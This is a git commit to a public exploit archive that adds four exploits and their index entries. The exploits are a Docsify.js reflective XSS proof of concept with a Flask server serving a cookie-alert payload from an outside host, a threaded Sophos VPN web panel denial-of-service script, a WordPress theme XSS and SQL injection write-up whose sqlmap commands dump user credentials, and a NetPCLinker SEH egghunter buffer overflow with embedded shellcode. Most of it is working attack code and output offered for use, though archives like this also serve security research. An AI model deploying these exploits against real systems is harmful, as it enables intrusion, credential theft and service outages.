DB: 2020-07-23

4 changes to exploits/shellcodes

NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)
Docsify.js 4.11.4 - Reflective Cross-Site Scripting
WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection
Sophos VPN Web Panel 2020 - Denial of Service (Poc)
This commit is contained in:
Offensive Security 2020-07-23 05:02:04 +00:00
parent bd3d5964fc
commit 67c1f99f41
5 changed files with 284 additions and 0 deletions

View file

@ -0,0 +1,66 @@
# Exploit Title: Docsify.js 4.11.4 - Reflective Cross-Site Scripting
# Date: 2020-06-22
# Exploit Author: Amin Sharifi
# Vendor Homepage: https://docsify.js.org
# Software Link: https://github.com/docsifyjs/docsify
# Version: 4.11.4
# Tested on: Windows 10
# CVE : CVE-2020-7680
docsify.js uses fragment identifiers (parameters after # sign) to load
resources from server-side .md files. it then renders the .md file inside
the HTML page.
For example : https://docsify.js.org/#/quickstart sends an ajax to
https://docsify.js.org/quickstart.md and renders it inside the html page.
due to lack of validation it is possible to provide external URLs after the
/#/ and render arbitrary javascript/HTML inside the page which leads to
DOM-based Cross Site Scripting (XSS).
Steps to reproduce:
step 1. setup a server (for example I use flask here, for the POC im
hosting one on https://asharifi.pythonanywhere.com )
step 2. the server should respond to request to /README.md with a crafted
XSS payload. here is the payload "Html Injection and XSS PoC</p><img src=1
onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>"
also the CORS should be set so that other Origins would be able to send
ajax requests to the server so Access-Control-Allow-Origin must be set to *
(or to the specific domain that you wanna exploit) example code below:
-------------------------------------------------
from flask import Flask
import flask
app = Flask(__name__)
@app.route('/README.md')
def inject():
resp = flask.Response("Html Injection and XSS PoC</p><img src=1
onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>")
resp.headers['Access-Control-Allow-Origin'] = '*'
return resp
------------------------------------------------------
step 3. craft the link for execution of the exploit
for example for https://docsify.js.org website you can create the link as
below
https://docsify.js.org/#//asharifi.pythonanywhere.com/README
(note that the mentioned domain is no longer vulnerable at the time writing
this report)
when a user visits this URL an ajax request will be sent to
asharifi.pythonanywhere.com/README.md and the response of the request will
be rendered inside the webpage which results in XSS payload being executed
on the page.
snyk advisory: https://snyk.io/vuln/SNYK-JS-DOCSIFY-567099
Mitre CVE entry:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7680

View file

@ -0,0 +1,99 @@
# Exploit Title: Sophos VPN Web Panel 2020 - Denial of Service (Poc)
# Date: 2020-06-17
# Exploit Author: Berk KIRAS
# Vendor Homepage: https://www.sophos.com/
# Version:2020 Web Panel
# Tested on: Apache
# Berk KIRAS PwC - Cyber Security Specialist
# Sophos VPN Web Portal Denial of Service Vulnerability
# System parse JSON data. If we want to send some JSON with invalid data format
# for ex. valid -> {"test","test2"} , invalid -> {"test",PAYLOAD"test2"}
# The system can not parse this data fastly and service down
# payload_option2 ="../../../../../../../../../FILE./FILE"
#!/usr/bin/python3
import requests
import sys
import random
import threading
def send_req():
cnt = random.randint(9,22)
payload= "../"*cnt+'{FILE}'
my_datas_params = {"username":"test",
payload+"password":"admin",
"cookie":"0",
"submit":"<div class=\"login_screen_login_button_left\"></div><div class=\"login_screen_login_button_middle\">Oturum Aç</div><div class=\"login_screen_login_button_right\"></div>",
"language":"turkish",
"browser_id":"kbgacsyo-q4j5o7lr70e"}
# You should change some values into the headers
Host_addr = sys.argv[2]
Origin=sys.argv[1]+"://"+sys.argv[2]
Referrer=sys.argv[1]+"://"+sys.argv[2]
Cookie=sys.argv[4]
#Headers
my_datas_headers ={
"Host":str(Host_addr),
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0",
"Accept": "text/javascript, text/html, application/xml, text/xml, */*",
"Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"X-Requested-With": "XMLHttpRequest",
"X-Prototype-Version": "1.6.1_rc3",
"Content-type": "application/json; charset=UTF-8",
"Origin":Origin,
"Connection": "close",
"Referer":Referrer,
"Cookie":Cookie,
}
my_datas_headers2 ={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0",
"Accept": "text/javascript, text/html, application/xml, text/xml, */*",
"Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"X-Requested-With": "XMLHttpRequest",
"X-Prototype-Version": "1.6.1_rc3",
"Content-type": "application/json; charset=UTF-8",
"Connection": "close",
}
#If you want to edit and add headers some headers added
s = requests.session()
#if you want simple-> headers={'User-Agent': 'Mozilla', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'}
s.headers.update(my_datas_headers2)
print(s.headers.items)
r = s.post(sys.argv[1]+"://"+sys.argv[2]+sys.argv[3],data=my_datas_params)
return s
def main():
if(len(sys.argv) < 6):
print("Usage:1) Implement your headers \n2)change payload if you want \n3) exploit.py <http/https> <domain> <page> <cookie-val> <Thread(1-10)> \nExample-> exploit.py http vpn.test.com /test/index.plx 2\nCoded by b3rkk1r4s | PwC Cyber")
sys.exit(0)
else:
try:
req_count=0
while(True):
if(int(sys.argv[5])==1):
resp = send_req()
req_count=req_count+1
print("Sending Requests... Count: "+str(req_count))
else:
threads = int(sys.argv[5])
jobs = []
for i in range(0, threads):
out_list = list()
thread = threading.Thread(target=send_req)
jobs.append(thread)
for j in jobs:
j.start()
print("Jobs Started!")
# Ensure all of the threads have finished
for j in jobs:
j.join()
except Exception:
print(Exception)
main()

View file

@ -0,0 +1,53 @@
# Exploit Title: WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection
# Google Dork: inurl:/wp-content/themes/nexos/
# Date: 2020-06-17
# Exploit Author: Vlad Vector
# Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ]
# Software Version: 1.7
# Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242
# Tested on: Debian 10
# CVE: CVE-2020-15363, CVE-2020-15364
# CWE: CWE-79, CWE-89
### [ Info: ]
[i] The Nexos theme through 1.7 for WordPress allows side-map/?search_order= SQL Injection.
### [ Vulnerabilities: ]
[x] Unauthenticated Reflected XSS
[x] SQL Injection
### [ PoC Unauthenticated Reflected XSS: ]
[!] TARGET/TARGET-DIR/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`VLΛDVΞCTOR`);window.location=`https://twitter.com/vlad_vector`%3E>
[!] GET /TARGET-DIR/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E%3E HTTP/1.1
Host: listing-themes.com
### [ PoC SQL Injection: ]
[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4
[02:23:33] [INFO] the back-end DBMS is MySQL
[02:23:33] [INFO] fetching database names
[02:23:33] [INFO] fetching number of databases
[02:23:33] [INFO] resumed: 2
available databases [2]:
[*] geniuscr_nexos
[*] information_schema
[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8
Database: TARGET-DB
Table: wp_users
[9 entries]
+--------------+------------------------------------+-------------------------+

62
exploits/windows/local/48680.py Executable file
View file

@ -0,0 +1,62 @@
# Exploit Title: NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)
# Date: 2019-06-28
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: https://sourceforge.net/projects/netpclinker/
# Software Link: https://sourceforge.net/projects/netpclinker/files/
# Version: 1.0.0.0
# Tested on: Windows Vista SP1
#!/usr/bin/python
'''
# Replicate Crash:
1) Install and Run the application
2) Go to second tab "Clients Control Panel"
3) Press Add button
4) Run the exploit , the exploit creates a text file named payload.txt
5) Copy payload.txt contents into the add client dialog , "DNS/IP" field
6) Press OK . Your shellcode will be executed by pressing OK button.
'''
#msfvenom -p windows/exec CMD=calc -f c -b "\x00\x0a\x0d\x33\x35\x36"
#Bad Characters : \x0a\x0d\x33\x35\x36
shellcode = (
"\xdb\xc4\xd9\x74\x24\xf4\x5b\xbe\x9a\x32\x43\xd2\x31\xc9\xb1"
"\x30\x83\xc3\x04\x31\x73\x14\x03\x73\x8e\xd0\xb6\x2e\x46\x96"
"\x39\xcf\x96\xf7\xb0\x2a\xa7\x37\xa6\x3f\x97\x87\xac\x12\x1b"
"\x63\xe0\x86\xa8\x01\x2d\xa8\x19\xaf\x0b\x87\x9a\x9c\x68\x86"
"\x18\xdf\xbc\x68\x21\x10\xb1\x69\x66\x4d\x38\x3b\x3f\x19\xef"
"\xac\x34\x57\x2c\x46\x06\x79\x34\xbb\xde\x78\x15\x6a\x55\x23"
"\xb5\x8c\xba\x5f\xfc\x96\xdf\x5a\xb6\x2d\x2b\x10\x49\xe4\x62"
"\xd9\xe6\xc9\x4b\x28\xf6\x0e\x6b\xd3\x8d\x66\x88\x6e\x96\xbc"
"\xf3\xb4\x13\x27\x53\x3e\x83\x83\x62\x93\x52\x47\x68\x58\x10"
"\x0f\x6c\x5f\xf5\x3b\x88\xd4\xf8\xeb\x19\xae\xde\x2f\x42\x74"
"\x7e\x69\x2e\xdb\x7f\x69\x91\x84\x25\xe1\x3f\xd0\x57\xa8\x55"
"\x27\xe5\xd6\x1b\x27\xf5\xd8\x0b\x40\xc4\x53\xc4\x17\xd9\xb1"
"\xa1\xe8\x93\x98\x83\x60\x7a\x49\x96\xec\x7d\xa7\xd4\x08\xfe"
"\x42\xa4\xee\x1e\x27\xa1\xab\x98\xdb\xdb\xa4\x4c\xdc\x48\xc4"
"\x44\xbf\x0f\x56\x04\x40"
)
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x65\x7a\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
nSEH = '\xEB\xAA\x90\x90' #Jump Back
# (Vista)
# PPR(ecx) : 0x00494b67 : startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [NPL.exe]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.0 (C:\Program Files\NetPCLinker\NPL.exe)
SEH = '\x67\x4b\x49'
offset = "RezaReza"+shellcode +'\x41'*(1199-8-len(shellcode)-len(egghunter)-50)
payload = offset+egghunter+"\x90"*50+nSEH+SEH
try:
f=open("payload.txt","w")
print("[+] Creating %s bytes payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

View file

@ -11122,6 +11122,7 @@ id,file,description,date,author,type,platform,port
48644,exploits/hardware/local/48644.c,"Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel Local Privilege Escalation (PoC)",2020-03-21,TheFloW,local,hardware,
48677,exploits/windows/local/48677.txt,"Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path",2020-07-17,"Velayutham Selvaraj",local,windows,
48678,exploits/windows/local/48678.py,"Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)",2020-07-17,PovlTekstTV,local,windows,
48680,exploits/windows/local/48680.py,"NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)",2020-07-22,"Saeed reza Zamanian",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42926,3 +42927,6 @@ id,file,description,date,author,type,platform,port
48674,exploits/php/webapps/48674.txt,"Infor Storefront B2B 1.0 - 'usr_name' SQL Injection",2020-07-15,ratboy,webapps,php,
48676,exploits/lua/webapps/48676.txt,"Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)",2020-07-16,V1n1v131r4,webapps,lua,
48679,exploits/php/webapps/48679.txt,"CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)",2020-07-17,Noth,webapps,php,
48681,exploits/multiple/webapps/48681.txt,"Docsify.js 4.11.4 - Reflective Cross-Site Scripting",2020-07-22,"Amin Sharifi",webapps,multiple,
48682,exploits/php/webapps/48682.txt,"WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection",2020-07-22,"Vlad Vector",webapps,php,
48683,exploits/multiple/webapps/48683.py,"Sophos VPN Web Panel 2020 - Denial of Service (Poc)",2020-07-22,"Berk KIRAS",webapps,multiple,

Can't render this file because it is too large.